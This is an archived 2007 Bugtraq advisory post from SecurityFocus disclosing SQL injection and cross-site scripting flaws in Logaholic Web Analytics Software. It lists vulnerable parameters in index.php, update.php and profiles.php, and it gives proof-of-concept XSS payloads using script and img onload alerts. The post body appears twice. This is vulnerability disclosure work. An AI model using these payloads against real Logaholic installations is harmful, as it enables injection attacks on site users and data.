Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Focus On: Vista
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Back to list
|
Post reply
Logaholic Web Analytics Software
Dec 23 2007 05:29AM
malibu r hotmail com
# Logaholic Web Analytics Software
# Bug found by malibu.r
# Contact: malibu.r (at) hotmail (dot) com [email concealed]
#
[*]SQL Injection
GET /logaholic/index.php?conf=nameofprofile&from=SQL INJECTION
GET /logaholic/update.php?conf=nameofprofile&page=SQL INjection
[*]Cross Site Scripting
POST variable "newconfname" in profiles.php?conf=nameofprofile to
>"><ScRiPt%20%0a%0d>alert(xss)%3B</ScRiPt> in /logaholic/profiles.php
index.php?conf=<img+src=http://testingsite.com/yep.gif+onload=alert(8120
51443)>
[ reply ]
Privacy Statement
Copyright 2007, SecurityFocus
# Bug found by malibu.r
# Contact: malibu.r (at) hotmail (dot) com [email concealed]
#
[*]SQL Injection
GET /logaholic/index.php?conf=nameofprofile&from=SQL INJECTION
GET /logaholic/update.php?conf=nameofprofile&page=SQL INjection
[*]Cross Site Scripting
POST variable "newconfname" in profiles.php?conf=nameofprofile to
>"><ScRiPt%20%0a%0d>alert(xss)%3B</ScRiPt> in /logaholic/profiles.php
index.php?conf=<img+src=http://testingsite.com/yep.gif+onload=alert(8120
51443)>
[ reply ]